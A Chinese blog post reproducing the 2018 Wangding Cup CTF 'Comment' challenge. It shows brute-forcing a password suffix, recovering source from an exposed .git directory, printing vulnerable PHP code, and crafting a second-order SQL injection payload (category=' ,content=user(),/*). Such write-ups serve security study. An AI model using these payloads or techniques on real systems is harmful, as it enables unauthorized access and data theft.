2018-Comment-网鼎杯复现,二次注入

已于 2024-08-05 13:59:21 修改
阅读量270 收藏 2
点赞数 2
文章标签: 安全
于 2024-08-05 13:47:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a15183865601/article/details/140920224
版权

进入靶场

发现只有一个发帖功能,尝试发帖

提交后要去登录,但这里提示了账号密码,但密码后三位不知,可以尝试暴力破解

bp抓包

假设后三位是数字,设置payload

爆破成功,后三位为666

登录成功

但除了发帖没有其他有用信息,尝试工具扫描

发现.git

禁止访问

使用githacker恢复文件

//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

发现在发帖时传递留言板参数使用了addslashes函数

查询php官方

说明在参数中出现引号会在前面加入反斜线

提交帖子时为write

提交留言时为comment

分析代码,在提交帖子时入库,在提交留言时会出库,而mysql在入库时会丢弃反斜线,所以可以使用二次注入,且取的是category

所以在category处写入单引号,通过addslashes函数会加上反斜线,入库时mysql会去掉反斜线,最终category查询出来就没有反斜线

$bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";

最终的查询

 $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);

category加上单引号逃出单引号的限制,bo_id为数字,所以只有在content上写我们要查询的内容

构造payload:

category=' ,content=user(),/*

content=*/#

构造了一个content,需要将原来的content注释掉

结合到查询语句中

insert into comment
       set category = ' ',content=user(),/*',
           content = '*/#',
           bo_id = '$bo_id'";

由于最终显示的是content的内容,

成功注入

a15183865601
关注
caozha-comment(原生PHP评论系统)-PHP
06-21
caozha-comment是一个功能强大的评论系统,采用原生PHP编写,不依赖任何框架,特点:易上手,零门槛,界面清爽极简,极便于二次开发。可以自动适配电脑、平板和手机等不同客户端。caozha-comment安装使用:快速安装1...
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器网关...
remark-comment-config:插件配置带注释的评论
05-10
npm install remark-comment-config 用 假设我们有以下文件example.md : <!-- remark bullet="+" --> - List item (this is a stringify setting) 我们的脚本example.js如下所示: var vfile = require ( ...
halo-comment::speech_balloon:Halo默认评论组件
04-30
halo-comment是的用户评论模块。 项目设置 npm install 编译和热重装以进行开发 npm run serve 编译并最小化生产 npm run build-comment 运行测试 npm run test 整理和修复文件 npm run lint 自定义配置 请参阅。
caozha-comment 原生PHP评论系统
08-14
caozha-comment是一个功能强大的评论系统,采用原生PHP编写,不依赖任何框架,特点:易上手,零门槛,界面清爽极简,极便于二次开发。可以自动适配电脑、平板和手机等不同客户端。caozha-comment安装使用:快速安装1...
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1190
本文主要介绍网络安全认识与学习规划
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1829
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 802
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
【Authing身份云-注册安全分析报告-无验证方式导致安全隐患】
09-09 804
Authing身份云隶属于北京蒸汽记忆科技有限公司, 是专业的员工身份管理和用户身份管理服务提供商,为企业和开发者提供快速、安全的身份认证和访问管理方案。基于员工和用户身份管理,Authing 推出了单点登录、自适应多因素认证、手机号码闪验、应用集成网关、权限管理、通用登录组件、自定义数据库连接等产品。作为身份验证的厂家,好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1461
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
GORM安全-保护你的应用免受SQL注入攻击
最新发布
一起coding,一起嗨。
09-12 418
GORM安全-保护你的应用免受SQL注入攻击
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 497
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
剖析Cookie的工作原理及其安全风险
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 1303
Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie。
守护应用边界:通过反射API实现安全的输入输出过滤
apixixi的博客
09-09 484
首先,你需要定义哪些类、方法或字段是安全的,可以通过反射访问。这可以通过白名单机制来实现,即只有在白名单中的类或方法才允许被访问。java复制代码static {> clazz) {通过使用白名单和输入验证,你可以在Java中使用反射API时提高应用的安全性。然而,过度依赖反射可能会降低代码的可读性和性能,因此请慎重考虑是否需要在你的应用中使用反射。
网络安全应急响应技术原理与应用
weixin_49171105的博客
09-06 527
概念为应对网络安全事件,相关人员或组织机构对网络安全事件进行监测、预警、分析、响应和恢复等工作。
TRIZ在充电桩安全中的应用探究
tianxingjian713的博客
09-06 628
通过运用TRIZ的工具和原则,可以有效地解决充电桩在电气、机械、环境和网络等方面的安全问题,提高充电桩的可靠性和安全性,为电动汽车的普及和发展提供有力保障。在当今电动汽车日益普及的时代,充电桩的安全问题至关重要。-运用TRIZ的物场分析方法,优化充电插头和插座的设计,提高插拔的可靠性和稳定性,减少机械故障的发生。-利用TRIZ的动态化原理,设计可调节的充电桩结构,使其能够适应不同的天气条件,如防风、防雨、防晒等。2.机械安全风险:如充电桩外壳的坚固程度、充电插头的插拔可靠性等,可能影响用户的使用安全
客户案例:安全海外中继助力知名家电企业化解海外通邮困境
CACTER_S的博客
09-09 532
安全海外中继获客户满分好评!
加密与安全_ sm-crypto 国密算法sm2、sm3和sm4的Java库
小工匠
09-05 869
国密算法sm2、sm3和sm4的java版。基于js版本进行封装,无缝兼容js版公私钥加解密。ps:理论上来说,只做纯签名是最快的。如果需要使用已发布的版本,在。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值